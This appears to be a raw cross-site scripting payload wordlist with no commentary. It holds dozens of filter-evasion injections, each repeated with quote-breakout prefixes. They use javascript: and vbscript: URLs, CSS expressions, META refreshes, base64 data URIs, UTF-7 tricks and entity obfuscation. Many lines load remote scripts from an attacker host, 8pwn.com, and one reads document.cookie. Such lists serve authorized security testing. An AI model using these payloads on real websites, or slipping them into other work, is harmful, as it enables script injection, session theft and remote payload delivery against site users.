<STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
"><STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
'><STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X</br>
<IMG SRC='vbscript:msgbox("X")'>
"><IMG SRC='vbscript:msgbox("X")'>
'><IMG SRC='vbscript:msgbox("X")'>
<IMG SRC="livescript:[code]">
"><IMG SRC="livescript:[code]">
'><IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('X')>
"><BODY ONLOAD=alert('X')>
'><BODY ONLOAD=alert('X')>
<BGSOUND SRC="javascript:alert('X');">
"><BGSOUND SRC="javascript:alert('X');">
'><BGSOUND SRC="javascript:alert('X');">
<BR SIZE="&{alert('X')}">
"><BR SIZE="&{alert('X')}">
'><BR SIZE="&{alert('X')}">
<LINK REL="stylesheet" HREF="javascript:alert('X');">
"><LINK REL="stylesheet" HREF="javascript:alert('X');">
'><LINK REL="stylesheet" HREF="javascript:alert('X');">
<STYLE>BODY{-moz-binding:url("http://8pwn.com/xss_serve_payloads/X.xml#X")}</STYLE>
"><STYLE>BODY{-moz-binding:url("http://8pwn.com/xss_serve_payloads/X.xml#X")}</STYLE>
'><STYLE>BODY{-moz-binding:url("http://8pwn.com/xss_serve_payloads/X.xml#X")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
"><STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
'><STYLE>@im\port'\ja\vasc\ript:alert("X")';</STYLE>
<IMG STYLE="X:expr/*X*/ession(alert('X'))">
"><IMG STYLE="X:expr/*X*/ession(alert('X'))">
'><IMG STYLE="X:expr/*X*/ession(alert('X'))">
<STYLE TYPE="text/javascript">alert('X');</STYLE>
"><STYLE TYPE="text/javascript">alert('X');</STYLE>
'><STYLE TYPE="text/javascript">alert('X');</STYLE>
<STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
"><STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
'><STYLE>.X{background-image:url("javascript:alert('X')");}</STYLE><A CLASS=X></A>
"><A CLASS=X></A>
'><A CLASS=X></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
"><STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
'><STYLE type="text/css">BODY{background:url("javascript:alert('X')")}</STYLE>
<X STYLE="X:expression(alert('X'))">
"><X STYLE="X:expression(alert('X'))">
'><X STYLE="X:expression(alert('X'))">
<X STYLE="behavior: url(X.htc);">
"><X STYLE="behavior: url(X.htc);">
'><X STYLE="behavior: url(X.htc);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('X');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('X');">
<IFRAME SRC="javascript:alert('X');"></IFRAME>
"><IFRAME SRC="javascript:alert('X');"></IFRAME>
'><IFRAME SRC="javascript:alert('X');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
"><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
'><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
"><FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
'><FRAMESET><FRAME SRC="javascript:alert('X');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('X')">
"><TABLE BACKGROUND="javascript:alert('X')">
'><TABLE BACKGROUND="javascript:alert('X')">
<TABLE><TD BACKGROUND="javascript:alert('X')">
"><TABLE><TD BACKGROUND="javascript:alert('X')">
'><TABLE><TD BACKGROUND="javascript:alert('X')">
<DIV STYLE="background-image: url(javascript:alert('X'))">
"><DIV STYLE="background-image: url(javascript:alert('X'))">
'><DIV STYLE="background-image: url(javascript:alert('X'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
"><DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
'><DIV STYLE="background-image: url(&#1;javascript:alert('X'))">
<DIV STYLE="width: expression(alert('X'));">
"><DIV STYLE="width: expression(alert('X'));">
'><DIV STYLE="width: expression(alert('X'));">
<BASE HREF="javascript:alert('X');//">
"><BASE HREF="javascript:alert('X');//">
'><BASE HREF="javascript:alert('X');//">
<object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/X.js"></object>
"><object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/X.js"></object>
'><object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/X.js"></object>
<object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></object>
"><object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></object>
'><object type="text/x-scriptlet" data="http://8pwn.com/xss_serve_payloads/bmpz.bmp"></object>
<OBJECT TYPE="text/x-scriptlet" DATA="http://8pwn.com/xss_serve_payloads/X.html"></OBJECT>
"><OBJECT TYPE="text/x-scriptlet" DATA="http://8pwn.com/xss_serve_payloads/X.html"></OBJECT>
'><OBJECT TYPE="text/x-scriptlet" DATA="http://8pwn.com/xss_serve_payloads/X.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
"><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
'><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://8pwn.com/xss_serve_payloads/X.jpg"></SCRIPT>
"><SCRIPT SRC="http://8pwn.com/xss_serve_payloads/X.jpg"></SCRIPT>
'><SCRIPT SRC="http://8pwn.com/xss_serve_payloads/X.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>'"-->
"><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>'"-->
'><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/X.js></SCRIPT>'"-->
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
"><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
'><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://8pwn.com/xss_serve_payloads/bmpz.bmp></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
"><? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
'><? echo('<SCR)';echo('IPT>alert("X")</SCRIPT>'); ?>
Redirect 302 /axaaX.jpg http://8pwn.com/xss_serve_payloads/X.html
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
"><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
'><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('X')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('X');+ADw-/SCRIPT+AD4-
"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('X');+ADw-/SCRIPT+AD4-
'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('X');+ADw-/SCRIPT+AD4-
<A HREF="http://127.0.0.1/">X</A>
"><A HREF="http://127.0.0.1/">X</A>
'><A HREF="http://127.0.0.1/">X</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
"><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
'><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>
<A HREF="http://0102.0146.0007.00000223/">X</A>
"><A HREF="http://0102.0146.0007.00000223/">X</A>
'><A HREF="http://0102.0146.0007.00000223/">X</A>
<A HREF="htt	p://6	6.000146.0x7.147/">X</A>
"><A HREF="htt	p://6	6.000146.0x7.147/">X</A>
'><A HREF="htt	p://6	6.000146.0x7.147/">X</A>
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
"><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
'><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
"><svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
'><svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
"><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
'><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
"><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
'><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
"><img/src=`%00` onerror=this.onerror=confirm(1)
'><img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
"><form><isindex formaction="javascript&colon;confirm(1)"
'><form><isindex formaction="javascript&colon;confirm(1)"
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
"><img src=`%00`&NewLine; onerror=alert(1)&NewLine;
'><img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='http://8pwn.com/xss_serve_payloads/X.js' /&Tab;></script>
"><script/&Tab; src='http://8pwn.com/xss_serve_payloads/X.js' /&Tab;></script>
'><script/&Tab; src='http://8pwn.com/xss_serve_payloads/X.js' /&Tab;></script>
<script/&Tab; src='http://8pwn.com/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
"><script/&Tab; src='http://8pwn.com/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
'><script/&Tab; src='http://8pwn.com/xss_serve_payloads/bmpz.bmp' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
"><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
'><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
"><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
'><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
'><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
"><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
'><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
"><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
'><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://8pwn.com/xss_serve_payloads/X.html')></script
"><svg><script xlink:href=data&colon;,window.open('https://8pwn.com/xss_serve_payloads/X.html')></script
'><svg><script xlink:href=data&colon;,window.open('https://8pwn.com/xss_serve_payloads/X.html')></script
<svg><script x:href='http://8pwn.com/xss_serve_payloads/X.js'
"><svg><script x:href='http://8pwn.com/xss_serve_payloads/X.js'
'><svg><script x:href='http://8pwn.com/xss_serve_payloads/X.js'
<svg><script x:href='http://8pwn.com/xss_serve_payloads/bmpz.bmp'
"><svg><script x:href='http://8pwn.com/xss_serve_payloads/bmpz.bmp'
'><svg><script x:href='http://8pwn.com/xss_serve_payloads/bmpz.bmp'
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
"><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
'><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
"><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
'><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
"><form><a href="javascript:\u0061lert&#x28;1&#x29;">X
'><form><a href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
"></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
'></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
"><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
'><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
"><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
'><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
"><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
'><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a
http://www.keralacyberforce<script .in>alert(document.location)</script
